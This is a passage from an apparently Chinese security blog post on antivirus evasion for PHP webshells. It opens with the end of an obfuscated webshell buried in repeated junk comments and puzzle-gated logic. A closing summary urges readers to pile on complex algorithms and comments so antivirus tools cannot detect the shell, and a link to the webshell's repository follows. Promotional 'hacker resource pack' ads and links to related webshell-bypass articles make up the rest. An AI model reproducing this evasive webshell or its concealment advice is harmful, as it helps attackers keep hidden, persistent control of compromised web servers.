blockC/\*\\00\\00\\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\\00\\00\\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\\00\\00\\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\\00\\00\\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\\00\\00\\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\\00\\00\\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\\00\\00\\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\\00\\00\\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\\00\\00\\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\\00\\00\\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\\00\\00\\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\\00\\00\\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\\00\\00\\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\*/+ $this \-> blockD;  
        }  
  
        public function/\*\\00\\00\\00%00%00fvjiv  
        fmfveb vebvgebb;  
        gjisghtrehgtghbvtrifh 希儿世界第一可爱!\\00\\00\\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\\00\\00\\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\\00\\00\\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\\00\\00\\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\\00\\00\\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\\00\\00\\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\\00\\00\\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\\00\\00\\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\\00\\00\\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\\00\\00\\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\\00\\00\\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\\00\\00\\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\*/getLockerStatus() {  
            global $text;$text \=/\*\\00\\00\\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\\00\\00\\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\\00\\00\\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\\00\\00\\  
            00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\\00\\00\\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\\00\\00\\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\\00\\00\\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\\00\\00\\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\\00\\00\\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\\00\\00\\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\\00\\00\\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\\00\\00\\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\\00\\00\\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\*/strrev($text);  
            if ($this \-> blockA \===$this \-> blockB and $this \-> blockA \=== $this \-> blockC and $this \-> blockA \=== $this \-> blockD) return true;  
            else return false;  
        }  
    }  
  
    function pause($obj) {  
        global $appor5nnb;  
        if (!$appor5nnb \-> getLockerStatus()) die();  
        return $obj;  
    }  
  
    $appor5nnb \= new InazumaPuzzle();  
    $appor5nnb \-> \_\_AFG50CE4\_RG1();  
    $cvb33ff55 \= new PerlinNoise(3000, 700.4, 56.7, "DIFF\_PERLIN");  
    $cvb33ff55->\_\_BHUYTVV8\_1();  
    $cvb33ff55 \-> \_\_CPRBB0R0\_l();  
    $cvb33ff55 \->\_\_HNBB70CA\_5();    
?>

这个代码看着就乱,根本读不下去,里面很多无用代码,很容易被误导,读不懂。
图片

图片

图片

总结

webshell的免杀有很多方式,师傅们可以多加一些复杂的算法和注释进去,让代码变得混乱,这样杀毒软件就很难检测了。

参考

https://github.com/misaka19008/PerlinPuzzle-Webshell-PHP/blob/master/perlin.php
https://zhuanlan.zhihu.com/p/206271895?ivk_sa=1024320u&utm_id=0
https://www.miyoushe.com/ys/article/17414097https://blog.csdn.net/qq_45521281/article/details/105849770

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!

如侵权请私聊我们删文

END

黑客/网络安全学习包

资料目录

  1. 成长路线图&学习规划

  2. 配套视频教程

  3. SRC&黑客文籍

  4. 护网行动资料

  5. 黑客必读书单

  6. 面试题合集

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

1.成长路线图&学习规划

要学习一门新的技术,作为新手一定要先学习成长路线图方向不对,努力白费

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。


因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

2.视频教程

很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩


因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

3.SRC&黑客文籍

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍:

黑客资料由于是敏感资源,这里不能直接展示哦!

4.护网行动资料

其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!

5.黑客必读书单

**

**

6.面试题合集

当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。

更多内容为防止和谐,可以扫描获取~

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

网络攻击之-Webshell流量告警运营分析
村中少年的专栏
01-01 1796
通过流量数据包从webshell上传,webshell注入,webshell连接通信,Webshell工具利用的角度进行阐述Webshell的防御,告警研判以及处置建议
一些Webshell-Bypass的思路
2301_80127209的博客
05-11 803
—经过这一段时间的研究,针对webshell-Bypass我也有了一些自己的技巧,于是决定写下这文章,阅读前提是需要有一点PHP的语言基础。在讲解代码之前,需要简单了解一下不同查杀平台webshell查杀的查杀原理。对于一些较传统的Webshell查杀软件大多都是基于特征码进行查杀(正则表达式匹配关键字)。一些在线的Webshell查杀引擎则是在原有的基础上进行了技术革新,例如沙箱模拟运行,污点追踪,人工智能,机器学习等技术。以下称这两种类别的查杀平台为传统类和新兴类。
CTF入门教程(非常详细)从零基础入门到竞赛,看这一了!
Python_paipai的博客
12-11 1583
CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。发展至今,已经成为全球范围网络安全圈流行的竞赛形式,2013年全球举办了超过五十场国际性CTF赛事。而DEFCON作为CTF赛制的发源地,DEFCON CTF也成为了目前全球最高技术水平和影响力的CTF竞赛,类似于CTF赛场中的“世界杯”。MISC(安全杂项)
2024最新版Node.js下载安装及环境配置教程(非常详细)从零基础入门到精通,看完这一
web15185420056的博客
12-04 7334
选择对应你系统的Node.js版本,这里我选择的是Windows系统、64位Tips:如果想下载指定版本,点击【以往的版本】,即可选择自己想要的版本下载(1)下载完成后,双击安装包,开始安装Node.js(2)直接点【Next】按钮,此处可根据个人需求修改安装路径,修改完毕后继续点击【Next】按钮(3)可根据自身需求进行,此处我选择默认安装,继续点击【Next】按钮(4)不选中,直接点击【Next】按钮(5)点击【Install】按钮进行安装(6)安装完毕,点击【Finish】按钮。
CTF比赛含金量高吗?CTF夺旗赛入门到精通收藏这一
Python_paipai的博客
10-24 1301
Pwncli 一款简单、易用的 pwn 题调试与攻击工具,帮助你快速编写 pwn 题攻击脚本,并实现本地调试和远程攻击的便捷切换,提高你在 CTF 比赛中调试 pwn 题脚本的速度与效率。大学期间,我参加过很多CTF比赛,打过护网,就职某大厂联合实验室的时候,也成功防范了各种网络攻击和漏洞利用,提高了互联网安全防护水平。从事网络安全行业已经好几年,积累了丰富的技能和渗透经验。综上所述,CTF比赛的含金量确实较高,尤其对于热衷于信息安全的人来说,这类竞赛提供了许多有价值的机会和挑战。
【CTF 】一文章带你了解CTF那些事儿,CTF入门到精通收藏
小司机的奥拓
10-26 4038
为了帮助大家更好的学习网络安全,我给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂这些资料!点击下方蓝色字 即可免费领取↓↓↓🤟 基于入门网络安全/黑客打造的:👉黑客&网络安全入门&进阶学习资源包。
哥斯拉webshell安装和基础使用(非常详细),零基础入门到精通,看这一
分享Python知识
11-01 1552
哥斯拉webshell安装和基础使用(非常详细),零基础入门到精通,看这一
黑客入门教程(非常详细)从零基础入门到精通,看完这一
2301_76168381的博客
05-11 3005
就好比:肉鸡是什么?等等,你得知道它是什么意思,了解术语的话可以去看看这里的百度文库,写的还很不错,对大多数的黑客术语都有过渡,而且对计算机网络原理需要有着一定的基础,所以务必要去学习一下。因为你只要懂了个大概,对后期做渗透测试以及了解一些漏洞原理帮助是非常大的,网站的重要性就不需要多说了吧,要想成为一名黑客,不懂网站怎么可以。如果是真的开发一个程序把大象装冰箱里,还真就得一步步都要考虑到,而且每一步操作,可能出现的异常都要充分考虑清楚,尽可能在程序中把可能出现的所有异常都要做出处理。
【免杀】————4、Webshell如何bypass安全狗,D盾
Fly_鹏程万里
04-04 1181
前言 相信各位师傅都有自己过waf一句话的思路,我这写一下自己常用的思路与及具体方法,如有错误,还望大家斧正。上次很多师傅问我要的web漏扫的github地址抱歉还不能给你们,(毕设没答辩完,而且还没写完Orz) Webshell 这里,我主要是写phpwebshellbypass(主要是其他的没研究过),安全狗的版本是在官网下载的apache4.0版本。 D盾是2.0.9的 ...
10 分钟入门计算机基础(非常详细零基础入门到精通收藏这一
yy1715713348的博客
09-28 5507
计算机系统由硬件(Hardware)系统和软件(Software)系统两大部分组成。
渗透安全及渗透测试流程(非常详细零基础入门到精通收藏这一了!!!
logic1001的博客
03-09 6908
1、国际化标准组织(ISO)引用ISO-74982文献中对安全的定义:安全就是最大程度地减少数据和资源被攻击的可能性。2、《计算机信息安全系统保护条例》中的第三条规范了包括计算机网络系统在内的计算机信息系统安全的概述:“计算机信息系统的安全保护,应当保障计算机及其相关的配套的设备、设施(含网络)的安全,运行环境的安全,保障信息的安全,保障计算机功能的正常发挥,以维护计算机信息系统的安全运行。
new.bypass_bypass_NEW_免杀_webshell_phpwebshell_
10-03
【标题】"new.bypass_bypass_NEW_免杀_webshell_phpwebshell_" 指的是一种新型的Webshell,它带有“bypass”和“NEW”特性,表明这是一个旨在绕过安全检测,且是最新技术的PHP WebshellWebshell通常被黑客用于远程...
虚拟主机封杀webshell提权!!!!!!!!!!
10-01
本文将围绕“虚拟主机封杀WebShell提权”这一主题展开,详细介绍如何在Windows虚拟主机环境下,特别是针对ASP + SQL Server配置的服务器,通过一系列的安全策略来防范WebShell的入侵及利用,以及阻止Serv-U提权漏洞...
Redis
wjcurry的博客
05-11 674
这样在修改字符串的时候,可以通过 alloc - len 计算出剩余的空间大小,可以用来判断空间是否满足修改需求,如果不满足的话,就会自动将 SDS 的空间扩展至执行修改所需的大小,然后才执行实际的修改操作,所以使用 SDS 既不需要手动修改 SDS 的空间大小,也不会出现前面所说的缓冲区溢出的问题。因此, SDS 的 API 都是以处理二进制的方式来处理 SDS 存放在 buf[] 里的数据,程序不会对其中的数据做任何限制,数据写入的时候时什么样的,它被读取时就是什么样的。
o.redisson.client.handler.CommandsQueue : Exception occured. Channel
架构师:通透,才能写出好代码!
05-12 189
使用Redisson 2.15.2版本时,出现了与Netty通道相关的异常,具体表现为连接Redis服务器时发生错误。通过分析,问题可能源于该版本的jar包存在缺陷。解决方法是升级Redisson到3.16.1版本,替换原有的依赖配置。升级后,问题得到解决,系统恢复正常运行。建议在遇到类似问题时,优先考虑依赖库的版本更新,以修复潜在的bug。
Redis经典面试题
weixin_67807492的博客
05-10 1691
Redis是一个开源的、基于内存的键值存储系统,支持多种数据结构如字符串、哈希、列表、集合和有序集合,常用于缓存、分布式锁和消息队列等场景。Redis的持久化机制包括RDB和AOF,分别通过快照和追加命令文件来保证数据不丢失。Redis集群通过主从复制、哨兵机制和Cluster模式实现高可用性和水平扩展。Redis还提供了多种内存淘汰策略和事务机制,支持原子性操作和乐观锁。性能优化方法包括选择合适的数据结构、减少网络延迟、批量操作和优化持久化策略。
redis
2402_88116813的博客
05-12 262
在idea中对redis添加的字段会经过序列化导致idea无法查询redis中添加的字段,redis中无法查询idea中添加的字段。redis使用前要先声明一下要操作哪种数据存储类型。
Redis Cluster 集群搭建和集成使用详细步骤示例
最新发布
bsklhao的博客
05-13 708
通过以上步骤,您已成功搭建Redis集群并将其集成到Spring Boot应用中,实现了分布式缓存功能。
Redis | 实战 短信登录 】
2402_88700528的博客
05-08 1418
主要完成了基于Session实现登录,解决集群的Session共享问题,从而实现了基于Redis来实现共享Session登录。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值